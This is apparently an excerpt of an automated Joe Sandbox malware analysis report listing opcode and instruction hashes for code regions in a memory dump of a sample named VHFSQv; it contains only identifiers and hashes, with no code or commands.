                                                                                      • API String ID:
                                                                                      • Opcode ID: 974aa49ed5e694ddec04f2e1c20d93221bbe1358f9676c2defdbb863f2fe697d
                                                                                      • Instruction ID: 4c8d869070aab886325d92bc21579fe3bb7a279952328cd07845099683fae7eb
                                                                                      • Opcode Fuzzy Hash: 974aa49ed5e694ddec04f2e1c20d93221bbe1358f9676c2defdbb863f2fe697d
                                                                                      • Instruction Fuzzy Hash: B801A2327111209FC7299B3DE80492A77EAEF8971531541B9EC05DB374CA39EC028B90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000020.00000002.2814377669.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_32_2_15e0000_VHFSQv.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9aee3b72232203d92ca41d64ceeab0c4232d1ae346100c98e9612b1bb4ab0396
                                                                                      • Instruction ID: f0a898c43cd9db1bae70cb69a260cbce05b03261d254b18df39702f1ac3aa55d
                                                                                      • Opcode Fuzzy Hash: 9aee3b72232203d92ca41d64ceeab0c4232d1ae346100c98e9612b1bb4ab0396
                                                                                      • Instruction Fuzzy Hash: 36F044767111208FC7299B3DE84481A77EAEF8976531541B9EC05DB375CA39EC018F90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000020.00000002.2814377669.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_32_2_15e0000_VHFSQv.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 69254c7f11a9a73161a7c00d20087e36bf29521976961790123b4b4a8140001f
                                                                                      • Instruction ID: 3b3798c32b65ed9e40dd1658768f2dc1cd88763297dc7b3601081885356eb3fc
                                                                                      • Opcode Fuzzy Hash: 69254c7f11a9a73161a7c00d20087e36bf29521976961790123b4b4a8140001f
                                                                                      • Instruction Fuzzy Hash: D801A230B053458BDB196F74E46D36D3BA5BB41718F0404BDEA06C72D5DAAD8C86C741
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000020.00000002.2814377669.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_32_2_15e0000_VHFSQv.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 46fcbfad154e7aa2958f2abdf431a158697e1120d7182199ae107ffe39cfa680
                                                                                      • Instruction ID: 9f2e33cf1c9abe69aafdf34117547df6d85ab057b08acf8bdada2e49264adbcf
                                                                                      • Opcode Fuzzy Hash: 46fcbfad154e7aa2958f2abdf431a158697e1120d7182199ae107ffe39cfa680
                                                                                      • Instruction Fuzzy Hash: 51F06231B0121547DB186B78E45D32E3B99B740745F040179AA06C72C4DEEACC86C781
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000020.00000002.2814377669.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_32_2_15e0000_VHFSQv.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c2e30e9590d30e3293045f7edc57987dcc966ed4c03e187d4df4e4391551d888
                                                                                      • Instruction ID: 660415b5a1390d77e0cbbebf18fa5a6626e9ed66244f27807899b5fc0f716e4c
                                                                                      • Opcode Fuzzy Hash: c2e30e9590d30e3293045f7edc57987dcc966ed4c03e187d4df4e4391551d888
                                                                                      • Instruction Fuzzy Hash: 92F0F075D09244EECB05DBF5A85949CBFB5EF81304F0480DAD05697129E6784A09CB51
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000020.00000002.2814377669.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_32_2_15e0000_VHFSQv.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2d767f2f3d19ed7ab09d3bf5eeb96fe4f81201563d13e3ead947a7b0a4f850d6
                                                                                      • Instruction ID: 16980889991decb4555e6bc6f58c8d778ac3efa275a8786f38e7309693e16cb1
                                                                                      • Opcode Fuzzy Hash: 2d767f2f3d19ed7ab09d3bf5eeb96fe4f81201563d13e3ead947a7b0a4f850d6
                                                                                      • Instruction Fuzzy Hash: D3E09B353011049BC314DE69E85485EBBFEFBC8351B504539E90EC3319DE365C058B60
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000020.00000002.2814377669.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_32_2_15e0000_VHFSQv.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d725078bea3b246e09539920fbeb834361af5b88a28963a697065d8dc8c34b32
                                                                                      • Instruction ID: bbdf7b0723861f3c119ddae429bf124f816ade04837737d35e815151c911c5da
                                                                                      • Opcode Fuzzy Hash: d725078bea3b246e09539920fbeb834361af5b88a28963a697065d8dc8c34b32
                                                                                      • Instruction Fuzzy Hash: 4EF0A4B4A41205CFDB18EF64D1A8A68B7F1FF89704F1044A9E8069F3A5CB799C05CF01
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000020.00000002.2814377669.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_32_2_15e0000_VHFSQv.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ec3dfa8b32c28c6031546bc8e4f86d38ec23929cd947a14a117db281310144ee
                                                                                      • Instruction ID: c776bef5a2998c656e1f644e6aa57c02d7f808827adfd2fa51146b2f5609142e
                                                                                      • Opcode Fuzzy Hash: ec3dfa8b32c28c6031546bc8e4f86d38ec23929cd947a14a117db281310144ee
                                                                                      • Instruction Fuzzy Hash: D8E04F31A01109ABCB00DFA8ED11BDDB7BDFB85608F1041AD9808D3211E6359E049791
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000020.00000002.2814377669.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_32_2_15e0000_VHFSQv.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5707ec649875552988dd8df53002ae29277ebe9bc8d3db40e33861bdd3b4ebfc
                                                                                      • Instruction ID: 0e000f6b20e1368c62def9faf7809919e71abfc583d351aabb641dc7fcfffccb
                                                                                      • Opcode Fuzzy Hash: 5707ec649875552988dd8df53002ae29277ebe9bc8d3db40e33861bdd3b4ebfc
                                                                                      • Instruction Fuzzy Hash: 1CD01270E01109EFCB00DFA8E90155D77F9EB48208B1041A99809D3204EA355E049B81
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%